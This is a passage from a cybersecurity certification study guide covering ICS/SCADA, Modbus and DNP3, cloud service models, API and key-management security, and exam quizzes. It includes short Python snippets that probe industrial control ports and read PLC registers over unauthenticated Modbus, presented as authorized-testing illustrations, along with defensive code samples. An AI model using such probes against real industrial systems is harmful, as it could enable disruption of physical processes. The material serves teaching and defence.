Industrial control system (ICS) is a general term that
encompasses several types of control systems used in
industrial production. The most widespread is
supervisory control and data acquisition
(SCADA). SCADA is a system that operates with coded
signals over communication channels to provide control
of remote equipment. ICSs include the following
components:
• Sensors: Sensors typically have digital or analog
I/O and are not in a form that can be easily
communicated over long distances.
• Remote terminal units (RTUs): RTUs
connect to the sensors and convert sensor data to
digital data, including telemetry hardware.
• Programmable logic controllers (PLCs):
PLCs connect to the sensors and convert sensor
data to digital data; they do not include telemetry
hardware.
• Telemetry system: Such a system connects
RTUs and PLCs to control centers and the
enterprise.
• Human interface: Such an interface presents
data to the operator.
ICSs should be securely segregated from other networks
as a security layer. The Stuxnet virus hit the SCADA
systems used for the control and monitoring of industrial
processes. SCADA components are considered privileged
targets for cyberattacks. By using cyber tools, it is
possible to destroy an industrial process. This was the
idea behind the attack on the nuclear facility at Natanz,
intended to interfere with the Iranian nuclear program.
Considering the criticality of SCADA-based systems,
physical access to these systems must be strictly
controlled. Systems that integrate IT security with
physical access controls, such as badging systems and
video surveillance, should be deployed. In addition, a
solution should be integrated with existing information
security tools such as log management and IPS/IDS. A
helpful publication by NIST, SP 800-82 Rev. 2,
recommends that the major security objectives for an ICS
implementation include the following:
• Restricting logical access to the ICS network and
network activity
• Restricting physical access to the ICS network and
devices
• Protecting individual ICS components from
exploitation
• Restricting unauthorized modification of data
• Detecting security events and incidents
• Maintaining functionality during adverse
conditions
• Restoring the system after an incident
In a typical ICS, this means a defense-in-depth strategy
should include the following, according to SP 800-82
Rev. 2:
• Develop security policies, procedures, training,
and educational material that applies specifically
to the ICS.
• Address security throughout the life cycle of the
ICS.
• Implement a network topology for the ICS that has
multiple layers, with the most critical
communications occurring in the most secure and
reliable layer.
• Provide logical separation between the corporate
and ICS networks.
• Employ a DMZ network architecture.
• Ensure that critical components are redundant
and are on redundant networks.
• Design critical systems for graceful degradation
(fault tolerant) to prevent catastrophic cascading
events.
• Disable unused ports and services on ICS devices
after testing to assure this will not impact ICS
operation.
• Restrict physical access to the ICS network and
devices.
• Restrict ICS user privileges to only those that are
required to perform each person’s job.
• Use separate authentication mechanisms and
credentials for users of the ICS network and the
corporate network.
• Use modern technology, such as smart cards, for
Personal Identity Verification (PIV).
• Implement security controls such as intrusion
detection software, antivirus software, and file
integrity checking software, where technically
feasible, to prevent, deter, detect, and mitigate the
introduction, exposure, and propagation of
malicious software to, within, and from the ICS.
• Apply security techniques such as encryption
and/or cryptographic hashes to ICS data storage
and communications where determined
appropriate.
• Expeditiously deploy security patches after testing
all patches under field conditions on a test system
if possible, before installation on the ICS.
• Track and monitor audit trails on critical areas of
the ICS.
• Employ reliable and secure network protocols and
services where feasible.
SP 800-82 Rev. 2 recommends that security
professionals should consider the following when
designing security solutions for ICS devices: timeliness
and performance requirements, availability
requirements, risk management requirements, physical
effects, system operation, resource constraints,
communications, change management, managed
support, component lifetime, and component location.
ICS implementations use a variety of protocols and
services, including
• Modbus: A master/slave protocol that uses port
502
• BACnet: A master/slave protocol that uses port
47808 (introduced earlier in this chapter)
• LonWorks/LonTalk: A peer-to-peer protocol
that uses port 1679
• Distributed Network Protocol 3 (DNP3): A
master/slave protocol that uses port 19999 when
using Transport Layer Security (TLS) and port
20000 when not using TLS
ICS implementations can also use IEEE 802.1X, Zigbee,
and Bluetooth for communication.
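Because several of these protocols listen on well-known
TCP ports, a simple reachability check can reveal whether
ICS services are exposed to a network segment that
should not see them. The following standard-library
Python sketch probes the TCP-based ports listed above
against a host you are authorized to test (the address is
a placeholder); BACnet and LonTalk typically run over
UDP and would need a different probe.

import socket

ICS_TCP_PORTS = {502: "Modbus/TCP", 19999: "DNP3 over TLS", 20000: "DNP3"}

def probe(host, timeout=1.0):
    for port, proto in sorted(ICS_TCP_PORTS.items()):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            state = "open" if s.connect_ex((host, port)) == 0 else "closed/filtered"
            print(f"{proto:15} tcp/{port:<5} {state}")

probe("192.0.2.10")  # placeholder address; scan only with authorization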
SP 800-82 Rev. 2 outlines the following basic process for
developing an ICS security program:
1. Develop a business case for security.
2. Build and train a cross-functional team.
3. Define charter and scope.
4. Define specific ICS policies and procedures.
5. Implement an ICS Security Risk Management
Framework.
a. Define and inventory ICS assets.
b. Develop a security plan for ICS systems.
c. Perform a risk assessment.
d. Define the mitigation controls.
6. Provide training and raise security awareness for
ICS staff.
The ICS security architecture should include network
segregation and segmentation, boundary protection,
firewalls, a logically separated control network, and dual
network interface cards (NICs) and should focus mainly
on suitable isolation between control networks and
corporate networks. Security professionals should also
understand that many ICS/SCADA systems use weak
authentication and outdated operating systems. The
inability to patch these systems (and even the lack of
available patches) means that the vendor is usually not
proactively addressing any identified security issues.
Finally, many of these systems allow unauthorized
remote access, thereby making it easy for an attacker to
breach the system with little effort.
Modbus
As you learned in the previous discussion, Modbus is one
of the protocols used in industrial control systems. It is a
serial protocol created by Modicon (now Schneider
Electric) to be used by its PLCs. It is popular because it is
royalty free. It enables communication among many
devices connected to the same network; for example, a
system that measures water flow and communicates the
results to a computer. An example of a Modbus
architecture is shown in Figure 5-6.
Figure 5-6 Modbus Architecture
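The following minimal Python sketch, assuming the
pymodbus library (3.x) and a placeholder device address,
shows why network isolation matters: Modbus has no
authentication, so any host that can reach TCP port 502
can read, or write, a PLC's registers.

from pymodbus.client import ModbusTcpClient

client = ModbusTcpClient("192.0.2.50", port=502)  # placeholder PLC address
client.connect()
result = client.read_holding_registers(0, 2)  # first two holding registers
print(result.registers)                       # e.g., raw water-flow readings
client.close()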
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 5-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 5-2 Key Topics in Chapter 5
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
mobile device management (MDM)
bring your own device (BYOD) policies
Payment Card Industry Data Security Standard (PCI
DSS)
USB On-The-Go (USB OTG)
rooting or jailbreaking
push notification services
geotagging
near field communication (NFC)
domain bridging
Internet of Things (IoT)
embedded system
real-time operating system (RTOS)
System-on-Chip (SoC)
field programmable gate array (FPGA)
mantrap
proximity readers
Building Automation and Control Networks (BACnet)
Controller Area Network (CAN bus)
Incident Command System (ICS)
supervisory control and data acquisition (SCADA)
remote terminal units (RTUs)
programmable logic controllers (PLCs)
telemetry system
Modbus
LonWorks/LonTalk
Distributed Network Protocol 3 (DNP3)
REVIEW QUESTIONS
1. List at least two threats presented by the
introduction of personal mobile devices
(smartphones and tablets) into an organization’s
network.
2. What is the single biggest threat to mobile devices?
3. Match the term on the left with its definition on the
right.
4. ___________________ refers to a system of
interrelated computing devices, mechanical and
digital machines, and objects that are provided
with unique identifiers and the ability to transfer
data over a network without requiring human-to-human or human-to-computer interaction.
5. What process enabled the enemy to pinpoint the
location of four U.S. Army Apache helicopters on
the ground and destroy them?
6. Match the term on the left with its definition on the
right.
7. __________________ is a text messaging
service component of most telephone, World Wide
Web, and mobile telephony systems.
8. List at least one example of an IoT deployment.
9. A(n) __________________ is a series of two
doors with a small room between them.
10. To use the BACnet protocol in an IP world,
__________________ was developed.
Chapter 6. Threats and
Vulnerabilities Associated
with Operating in the
Cloud
This chapter covers the following topics related
to Objective 1.6 (Explain the threats and
vulnerabilities associated with operating in the
cloud) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
• Cloud service models: Describes Software as a
Service (SaaS), Platform as a Service (PaaS), and
Infrastructure as a Service (IaaS)
• Cloud deployment models: Covers public,
private, community, and hybrid clouds
• Function as a Service (FaaS)/serverless
architecture: Discusses the concepts of FaaS
• Infrastructure as code (IaC): Investigates the
use of scripting in the environment
• Insecure application programming
interface (API): Identifies vulnerabilities in the
use of APIs
• Improper key management: Discusses best
practices for key management
• Unprotected storage: Describes threats to
storage systems
• Logging and monitoring: Covers issues related
to insufficient logging and monitoring and
inability to access logging tools
Placing resources in a cloud environment has many
benefits, but also introduces a host of new security
considerations. This chapter discusses these
vulnerabilities and some measures that you can take to
mitigate them.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these eight self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 6-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 6-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
Caution
The goal of self-assessment is to gauge your mastery of the topics in this
chapter. If you do not know the answer to a question or are only partially sure
of the answer, you should mark that question as wrong for purposes of the self-assessment. Giving yourself credit for an answer you correctly guess skews
your self-assessment results and might provide you with a false sense of
security.
1. In which cloud deployment model does an
organization provide and manage some resources
in-house and have other resources provided
externally via a public cloud?
a. Private
b. Public
c. Community
d. Hybrid
2. Which of the following cloud service models is
typically used as a software development
environment?
a. SaaS
b. PaaS
c. IaaS
d. FaaS
3. Which of the following is an extension of the PaaS
model?
a. FaaS
b. IaC
c. SaaS
d. IaaS
4. Which of the following manages and provisions
computer data centers through machine-readable
definition files?
a. IaC
b. PaaS
c. SaaS
d. IaaS
5. Which of the following can enhance security of
APIs?
a. DPAPI
b. SGX
c. SOAP
d. REST
6. Which of the following contains recommendations
for key management?
a. NIST SP 800-57 Rev. 5
b. PCI-DSS
c. OWASP
d. FIPS
7. Which of the following is the most exposed part of a
cloud deployment?
a. Cryptographic functions
b. APIs
c. VMs
d. Containers
8. Which of the following is lost with improper
auditing? (Choose the best answer.)
a. Cryptographic security
b. Accountability
c. Data security
d. Visibility
FOUNDATION TOPICS
CLOUD DEPLOYMENT
MODELS
Cloud computing is all the rage these days, and it comes
in many forms. The basic idea of cloud computing is to
make resources available in a web-based data center so
the resources can be accessed from anywhere. When a
company pays another company to host and manage this
type of environment, it is considered to be a public cloud
solution. If the company hosts this environment itself, it
is considered to be a private cloud solution. The different
cloud deployment models are as follows:
• Public: A public cloud is the standard cloud
deployment model, in which a service provider
makes resources available to the public over the
Internet. Public cloud services may be free or may
be offered on a pay-per-use model. An
organization needs to have a business or technical
liaison responsible for managing the vendor
relationship but does not necessarily need a
specialist in cloud deployment. Vendors of public
cloud solutions include Amazon, IBM, Google,
Microsoft, and many more. In a public cloud
deployment model, subscribers can add and
remove resources as needed, based on their
subscription.
• Private: A private cloud is a cloud deployment
model in which a private organization implements
a cloud in its internal enterprise, and that cloud is
used by the organization’s employees and
partners. Private cloud services require an
organization to employ a specialist in cloud
deployment to manage the private cloud.
• Community: A community cloud is a cloud
deployment model in which the cloud
infrastructure is shared among several
organizations from a specific group with common
computing needs. In this model, agreements
should explicitly define the security controls that
will be in place to protect the data of each
organization involved in the community cloud and
how the cloud will be administered and managed.
• Hybrid: A hybrid cloud is a cloud deployment
model in which an organization provides and
manages some resources in-house and has others
provided externally via a public cloud. This model
requires a relationship with the service provider
as well as an in-house cloud deployment
specialist. Rules need to be defined to ensure that
a hybrid cloud is deployed properly. Confidential
and private information should be limited to the
private cloud.
CLOUD SERVICE MODELS
There are trade-offs to consider when a decision must be
made between cloud architectures. A private solution
provides the most control over the safety of your data but
also requires the staff and the knowledge to deploy,
manage, and secure the solution. A public cloud puts
your data’s safety in the hands of a third party, but that
party is more capable and knowledgeable about
protecting data in such an environment and managing
the cloud environment. With a public solution, various
cloud service models can be purchased. Some of these
models include the following:
• Software as a Service (SaaS): With SaaS, the
vendor provides the entire solution, including the
operating system, the infrastructure software, and
the application. The vendor may provide an email
system, for example, in which it hosts and
manages everything for the customer. An example
of this is a company that contracts to use
Salesforce or Intuit QuickBooks using a browser
rather than installing the application on every
machine. This frees the customer company from
performing updates and other maintenance of the
applications.
• Platform as a Service (PaaS): With PaaS, the
vendor provides the hardware platform or data
center and the software running on the platform,
including the operating systems and
infrastructure software. The customer is still
involved in managing the system. An example of
this is a company that engages a third party to
provide a development platform for internal
developers to use for development and testing.
• Infrastructure as a Service (IaaS): With
IaaS, the vendor provides the hardware platform
or data center, and the customer installs and
manages its own operating systems and
application systems. The vendor simply provides
access to the data center and maintains that
access. An example of this is a company hosting
all its web servers with a third party that provides
the infrastructure. With IaaS, customers can
benefit from the dynamic allocation of additional
resources in times of high activity, while those
same resources are scaled back when not needed,
which saves money.
Figure 6-1 illustrates the relationship of these services to
one another.
Figure 6-1 Cloud Service Models
FUNCTION AS A SERVICE
(FAAS)/SERVERLESS
ARCHITECTURE
Function as a Service (FaaS) is an extension of PaaS
that goes further and completely abstracts the virtual
server from the developers. In fact, charges are based not
on server instance sizes but on consumption and
executions. This is why it is sometimes also called
serverless architecture. In this architecture, the focus is
on a function, operation, or piece of code that is executed
as a function. These services are event-driven in nature.
Although FaaS is not perfect for every workload, for
transactions that happen hundreds of times per second,
there is a lot of value in isolating that logic to a function
that can be scaled. Additional advantages include the
following:
• Ideal for dynamic or burstable workloads:
If you run something only once a day or month,
there’s no need to pay for a server 24/7/365.
• Ideal for scheduled tasks: FaaS is a perfect
way to run a certain piece of code on a schedule.
Figure 6-2 shows a useful car analogy for comparing
traditional computing (own a car), cloud computing
(rent a car), and FaaS/serverless computing (car
sharing). VPS in the rent-a-car analogy stands for virtual
private server and refers to provisioning a virtual server
from a cloud service provider.
Figure 6-2 Car Analogy for Serverless Computing
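To make the model concrete, the following is a minimal
sketch of an event-driven function using the AWS Lambda
Python handler convention; the event fields are
illustrative. Note how the function validates its untrusted
event data, a point the issues list below returns to.

import json

def lambda_handler(event, context):
    # Treat the triggering event as untrusted input and validate it
    name = str(event.get("name", ""))[:64]
    if not name.isalnum():
        return {"statusCode": 400, "body": json.dumps({"error": "bad input"})}
    return {"statusCode": 200, "body": json.dumps({"greeting": f"Hello, {name}"})}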
The following are top security issues with serverless
computing:
• Function event data injection: Injection can be
triggered not only through untrusted input such as
a web API call but through any event source that
feeds the function
• Broken authentication: Coding issues ripe for
exploits and attacks that lead to unauthorized
authentication
• Insecure serverless deployment configuration:
Human error in setup
• Over-privileged function permissions and roles:
Failure to implement the least-privilege concept
INFRASTRUCTURE AS CODE
(IAC)
In another reordering of the way data centers are
handled, Infrastructure as Code (IaC) manages and
provisions computer data centers through machine-readable definition files, rather than physical hardware
configuration or interactive configuration tools. IaC can
use either scripts or declarative definitions, rather than
manual processes, but the term more often is used to
promote declarative approaches.
Naturally, there are advantages to this approach:
• Lower cost
• Faster speed
• Risk reduction (remove errors and security
violations)
Figure 6-3 illustrates an example of how some code
might be capable of making changes on its own without
manual intervention. As you can see in Figure 6-3, these
code changes can be made to the actual state of the
configurations in the cloud without manual intervention.
Figure 6-3 IaC in Action
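The following minimal sketch shows the declarative flavor
of IaC, assuming the Pulumi SDK with its AWS provider;
the resource name and arguments are illustrative. The
desired state, a private, versioned, encrypted storage
bucket, is declared in code, and the IaC engine converges
the cloud environment to match it, which speaks to
several of the issues listed next.

import pulumi_aws as aws

# Declare desired state; the IaC engine creates or updates the bucket to match.
bucket = aws.s3.Bucket(
    "app-logs",
    acl="private",                 # no public access
    versioning={"enabled": True},  # retain object history
    server_side_encryption_configuration={
        "rule": {"applyServerSideEncryptionByDefault": {"sseAlgorithm": "AES256"}}
    },
)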
Security issues with Infrastructure as Code (IaC) include
• Compliance violations: Policy guardrails based on
standards are not enforced
• Data exposures: Lack of encryption
• Hardcoded secrets: Storing plain text credentials,
such as SSH keys or account secrets, within source
code
• Disabled audit logs: Failure to utilize audit logging
services like AWS CloudTrail and Amazon
CloudWatch
• Untrusted image sources: Templates may
inadvertently refer to OS or container images
from untrusted sources
INSECURE APPLICATION
PROGRAMMING INTERFACE
(API)
Interfaces and APIs tend to be the most exposed parts of
a system because they’re usually accessible from the
open Internet. APIs are used extensively in cloud
environments. With respect to APIs, a host of
approaches—including Simple Object Access Protocol
(SOAP), REpresentational State Transfer (REST), and
JavaScript Object Notation (JSON)—are available, and
many enterprises find themselves using all of them.
The use of diverse protocols and APIs is also a challenge
to interoperability. With networking, storage, and
authentication protocols, support and understanding of
the protocols in use is required of both endpoints. It
should be a goal to reduce the number of protocols in use
in order to reduce the attack surface. Each protocol has
its own history of weaknesses to mitigate.
One API that can enhance cloud security is the Data
Protection API (DPAPI) offered by Windows. Let’s
look at what it offers. Among other features, DPAPI
supports in-memory processing, an approach in which
all data in a set is processed from memory rather than
from the hard drive. In-memory processing assumes that
all the data is available in memory rather than just the
most recently used data, as is usually the case when
using RAM or cache memory. This results in faster
reporting and decision making in business. Securing in-memory processing requires encrypting the data in RAM.
DPAPI lets you encrypt data using the user’s login
credentials. One of the key questions is where to store
the key, because storing it in the same location as the
data typically is not a good idea (the next section
discusses key management). Intel’s Software Guard
Extensions (SGX), shipping with Skylake and newer
CPUs, allows you to load a program into your processor,
verify that its state is correct (remotely), and protect its
execution. The CPU automatically encrypts everything
leaving the processor (that is, everything that is offloaded
to RAM) and thereby ensures security.
Even the most secure devices have some sort of API that
is used to perform tasks. Unfortunately, untrustworthy
people use those same APIs to perform unscrupulous
tasks. APIs are used in the Internet of Things (IoT) so
that devices can speak to each other without users even
knowing they are there. APIs are used to control and
monitor things we use every day, including fitness bands,
home thermostats, lighting, and automobiles.
Comprehensive security must protect the entire
spectrum of devices in the digital workplace, including
apps and APIs. API security is critical for an organization
that is exposing digital assets.
Guidelines for providing API security include the
following:
• Use the same security controls for APIs as for any
web application in the enterprise.
• Use Hash-based Message Authentication Code
(HMAC) to authenticate requests (see the sketch
after this list).
• Use encryption when passing static keys.
• Use a framework or an existing library to
implement security solutions for APIs.
• Implement password encryption instead of single
key-based authentication.
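The following standard-library Python sketch illustrates
the HMAC guideline; the header names and shared-secret
scheme are illustrative, not any particular vendor's API.
Each request is signed over its method, path, timestamp,
and body, and the verifier rejects stale timestamps to
blunt replay attacks.

import hashlib
import hmac
import time

SECRET = b"shared-secret-distributed-out-of-band"  # never hardcode in production

def sign_request(method: str, path: str, body: bytes) -> dict:
    timestamp = str(int(time.time()))
    message = "\n".join([method, path, timestamp]).encode() + b"\n" + body
    signature = hmac.new(SECRET, message, hashlib.sha256).hexdigest()
    return {"X-Timestamp": timestamp, "X-Signature": signature}

def verify_request(method, path, body, headers, max_skew=300) -> bool:
    if abs(time.time() - int(headers["X-Timestamp"])) > max_skew:
        return False  # reject replayed or stale requests
    message = "\n".join([method, path, headers["X-Timestamp"]]).encode() + b"\n" + body
    expected = hmac.new(SECRET, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, headers["X-Signature"])

headers = sign_request("POST", "/v1/orders", b'{"id": 7}')
print(verify_request("POST", "/v1/orders", b'{"id": 7}', headers))  # True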
IMPROPER KEY
MANAGEMENT
Key management is essential to ensure that the
cryptography provides confidentiality, integrity, and
authentication in cloud environments. If a key is
compromised, it can have serious consequences
throughout an organization.
Key management involves the entire process of ensuring
that keys are protected during creation, distribution,
transmission, and storage. As part of this process, keys
must also be destroyed properly. When you consider the
vast number of networks over which the key is
transmitted and the different types of systems on which a
key is stored, the enormity of this issue really comes to
light.
As the most demanding and critical aspect of
cryptography, it is important that security professionals
understand key management principles.
Keys should always be stored in ciphertext when stored
on a noncryptographic device. Key distribution, storage,
and maintenance should be automatic by integrating the
processes into the application.
Because keys can be lost, backup copies should be made
and stored in a secure location. A designated individual
should have control of the backup copies, and other
individuals should be designated to serve as emergency
backups. The key recovery process should also require
more than one operator, to ensure that only valid key
recovery requests are completed. In some cases, keys are
even broken into parts and deposited with trusted
agents, who provide their part of the key to a central
authority when authorized to do so. Although other
methods of distributing parts of a key are used, all the
solutions involve the use of trustee agents entrusted with
part of the key and a central authority tasked with
assembling the key from its parts. Also, key recovery
personnel should span across the entire organization and
not just be members of the IT department.
Organizations should also limit the number of keys that
are used. The more keys that you have, the more keys
you must ensure are protected. Although a valid reason
for issuing a key should never be ignored, limiting the
number of keys issued and used reduces the potential
damage.
When designing the key management process, you
should consider how to do the following:
• Securely store and transmit the keys
• Use random keys
• Issue keys of sufficient length to ensure protection
• Properly destroy keys when no longer needed
• Back up the keys to ensure that they can be
recovered
Systems that process valuable information require
controls in order to protect the information from
unauthorized disclosure and modification. Cryptographic
systems that contain keys and other cryptographic
information are especially critical. Security professionals
should work to ensure that the protection of keying
material provides accountability, audit, and survivability.
Accountability involves the identification of entities that
have access to, or control of, cryptographic keys
throughout their life cycles. Accountability can be an
effective tool to help prevent key compromises and to
reduce the impact of compromises when they are
detected. Although it is preferred that no humans be able
to view keys, as a minimum, the key management system
should account for all individuals who are able to view
plaintext cryptographic keys. In addition, more
sophisticated key management systems may account for
all individuals authorized to access or control any
cryptographic keys, whether in plaintext or ciphertext
form.
Two types of audits should be performed on key
management systems:
• Security: The security plan and the procedures
that are developed to support the plan should be
periodically audited to ensure that they continue
to support the key management policy.
• Protective: The protective mechanisms
employed should be periodically reassessed with
respect to the level of security they currently
provide and are expected to provide in the future.
They should also be assessed to determine
whether the mechanisms correctly and effectively
support the appropriate policies. New technology
developments and attacks should be considered as
part of a protective audit.
Key management survivability entails backing up or
archiving copies of all keys used. Key backup and
recovery procedures must be established to ensure that
keys are not lost. System redundancy and contingency
planning should also be properly assessed to ensure that
all the systems involved in key management are fault
tolerant.
Key Escrow
Key escrow is the process of storing keys with a third
party to ensure that decryption can occur. This is most
often used to collect evidence during investigations. Key
recovery is the process whereby a key is archived in a
safe place by the administrator.
Key Stretching
Key stretching, also referred to as key strengthening,
is a cryptographic technique that involves making a weak
key stronger by increasing the time it takes to test each
possible key. In key stretching, the original key is fed into
an algorithm to produce an enhanced key, which should
be at least 128 bits for effectiveness. If key stretching is
used, an attacker would need to either try every possible
combination of the enhanced key or try likely
combinations of the initial key. Key stretching slows
down the attacker because the attacker must compute
the stretching function for every guess in the attack.
Systems that use key stretching include Pretty Good
Privacy (PGP), GNU Privacy Guard (GPG), Wi-Fi
Protected Access (WPA), and WPA2. Widely used
password key-stretching algorithms include Password-Based Key Derivation Function 2 (PBKDF2), bcrypt, and
scrypt.
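The following standard-library Python sketch shows key
stretching with PBKDF2, one of the algorithms named
above: weak password material is fed through many
HMAC-SHA256 iterations to derive a key of at least 128
bits. The iteration count is illustrative.

import hashlib
import os

password = b"correct horse"   # weak input key material
salt = os.urandom(16)         # random salt, stored alongside the derived key
key = hashlib.pbkdf2_hmac("sha256", password, salt, 600_000, 32)  # 256-bit key
print(key.hex())  # each guess now costs an attacker 600,000 HMAC operations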
UNPROTECTED STORAGE
While cloud storage may seem like a great idea, it
presents many unique issues. Among them are the
following:
• Data breaches: Although cloud providers may
include safeguards in service-level agreements
(SLAs), ultimately the organization is responsible
for protecting its own data, regardless of where it
is located. When this data is not in your hands—
and you may not even know where it is physically
located at any point in time—protecting your data
is difficult.
• Authentication system failures: These
failures allow malicious individuals into the cloud.
This issue sometimes is made worse by the
organization itself when developers embed
credentials and cryptographic keys in source code
and leave them in public-facing repositories.
• Weak interfaces and APIs: Interfaces and
APIs tend to be the most exposed parts of a
system because they’re usually accessible from the
open Internet.
Transfer/Back Up Data to
Uncontrolled Storage
In some cases, users store sensitive data in cloud storage
that is outside the control of the organization, using sites
such as Dropbox. These storage providers have had their
share of data loss issues as well. Policies should address
and forbid this type of storage of organizational data,
including data from mobile devices.
Cloud services give end users more accessibility to their
data. However, this also means that end users can take
advantage of cloud storage to access and share company
data from any location. At that point, the IT team no
longer controls the data. This is the case with both public
and private clouds.
With private clouds, organizations can ensure the
following:
• That the data is stored only on internal resources
• That the data is owned by the organization
• That only authorized individuals are allowed to
access the data
• That data is always available
However, a private cloud is only protected by the
organization’s internal resources, and this protection can
often be affected by the knowledge level of the security
professionals responsible for managing the cloud
security.
With public clouds, organizations can ensure the
following:
• That data is protected by enterprise-class firewalls
and within a secured facility
• That attackers and disgruntled employees are
unsure of where the data actually resides
• That the cloud vendor provides security expertise
and maintains the level of service detailed in the
contract
However, public clouds can grant access to any location,
and data is transmitted over the Internet. Also, the
organization depends on the vendor for all services
provided. End users must be educated about cloud usage
and limitations as part of their security awareness
training. In addition, security policies should clearly
state where data can be stored, and ACLs should be
configured properly to ensure that only authorized
personnel can access data. The policies should also spell
out consequences for storing organizational data in cloud
locations that are not authorized.
Big Data
Big data is a term for sets of data so large or complex
that they cannot be analyzed by using traditional data
processing applications. These data sets are often stored
in the cloud to take advantage of the immense processing
power available there. Specialized applications have been
designed to help organizations with their big data. The
big data challenges that may be encountered include data
analysis, data capture, data search, data sharing, data
storage, and data privacy.
While big data is used to determine the causes of
failures, generate coupons at checkout, recalculate risk
portfolios, and find fraudulent activity before it ever has
a chance to affect the organization, its existence creates
security issues. The first issue is its unstructured nature.
Traditional data warehouses process structured data and
can store large amounts of it, but there is still a
requirement for structure.
Big data typically uses Hadoop, which requires no
structure. Hadoop is an open source framework used for
running applications and storing data. With the Hadoop
Distributed File System, individual servers that are
working in a cluster can fail without aborting the entire
computation process. There are no restrictions on the
data that this system can store. While big data is enticing because of the advantages it offers, it presents a number of issues when deployed in the cloud:
• Organizations still do not understand it very well,
and unexpected vulnerabilities can easily be
introduced.
• Big data platforms typically incorporate open-source code, which can contain unrecognized backdoors and default credentials.
• Attack surfaces of the nodes may not have been
reviewed, and servers may not have been
hardened sufficiently.
LOGGING AND MONITORING
Without proper auditing, you have no accountability.
You also have no way of knowing what is going on in
your environment. While the next two chapters include
ample discussion of logging and monitoring and its
application, this section briefly addresses the topic with
respect to cloud environments.
Insufficient Logging and Monitoring
Unfortunately, although most technicians agree with and
support the notion that proper auditing is necessary, in
the case of cloud deployments, the logging and
monitoring can leave much to be desired. “Insufficient
Logging and Monitoring” is one of the categories in the
Open Web Application Security Project’s (OWASP) Top
10 list and covers the list of best practices that should be
in place to prevent or limit the damage of security
breaches.
Security professionals should work to ensure that cloud
SLAs include access to logging and monitoring tools that
give the organization visibility into the cloud system in
which their data is held.
Inability to Access
One of the issues with using standard logging and monitoring tools in a cloud environment is the inability to access the environment in a way that provides real visibility into it. In some cases, the vendor will
resist allowing access to its environment. The time to
demand such access is when the SLA is in the process of
being negotiated.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 6-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 6-2 Key Topics in Chapter 6
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
Software as a Service (SaaS)
Platform as a Service (PaaS)
Infrastructure as a Service (IaaS)
public cloud
private cloud
community cloud
hybrid cloud
Function as a Service (FaaS)
Infrastructure as Code (IaC)
Data Protection API (DPAPI)
NIST SP 800-57 Rev. 5
key escrow
key stretching
big data
REVIEW QUESTIONS
1. With ______________, the vendor provides the
entire solution, including the operating system, the
infrastructure software, and the application.
2. Match the terms on the left with their definitions
on the right.
3. List at least one advantage of IaC.
4. ___ ________________ tend to be the most
exposed parts of a cloud system because they’re
usually accessible from the open Internet.
5. APIs are used in the ___________________ so
that devices can speak to each other without users
even knowing the APIs are there.
6. List at least one of the security issues with
serverless computing in the cloud.
7. Match the key state on the left with its definition on
the right.
8. In the _______________ phase of a key, the
keying material is not yet available for normal
cryptographic operations.
9. List at least one security issue with cloud storage.
10. ________________ is a term for sets of data so large or complex that they cannot be analyzed by using traditional data processing applications.
Chapter 7. Implementing
Controls to Mitigate
Attacks and Software
Vulnerabilities
This chapter covers the following topics related
to Objective 1.7 (Given a scenario, implement
controls to mitigate attacks and software
vulnerabilities) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
• Attack types: Describes XML attacks, SQL
injection, overflow attacks, remote code
execution, directory traversal, privilege escalation,
password spraying, credential stuffing,
impersonation, man-in-the-middle attacks,
session hijacking, rootkit, and cross-site scripting
• Vulnerabilities: Covers improper error
handling, dereferencing, insecure object
reference, race condition, broken authentication,
sensitive data exposure, insecure components,
insufficient logging and monitoring, weak or
default configurations, and use of insecure
functions
When vulnerabilities have been identified and possible
attacks have been anticipated, controls are used to
mitigate or address them. In some cases these controls
can eliminate a vulnerability, but in many cases they can
only lessen the likelihood or the impact of an attack. This
chapter discusses the various types of controls and how
they can be used.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these four self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 7-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 7-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a good solution when
disparate applications that use their own
authorization logic are in use in the enterprise?
a. XML
b. XACML
c. PDP
d. PEP
2. Which of the following attacks can result in reading
sensitive data from the database, modifying
database data, and executing administrative
operations on the database?
a. SQL injection
b. STUXNET
c. Integer overflow
d. TAXII
3. Which of the following has taken place when a
pointer with a value of NULL is used as though it
pointed to a valid memory area?
a. Insecure object reference
b. Improper error handing
c. Dereferencing
d. Advanced persistent threats
4. Which of the following is a type of race condition?
a. Time-of-check/time-of-use
b. NOP sled
c. Dereferencing
d. Overflow
FOUNDATION TOPICS
ATTACK TYPES
In this section we are going to look at the sort of things
that keep network and software security experts up at
night. We’ll look at specific network and software attack
methods that you must understand to be able to defend
against them. Then in the following section, we’ll talk
about vulnerabilities, which are characteristics of the
network and software environment in which we operate.
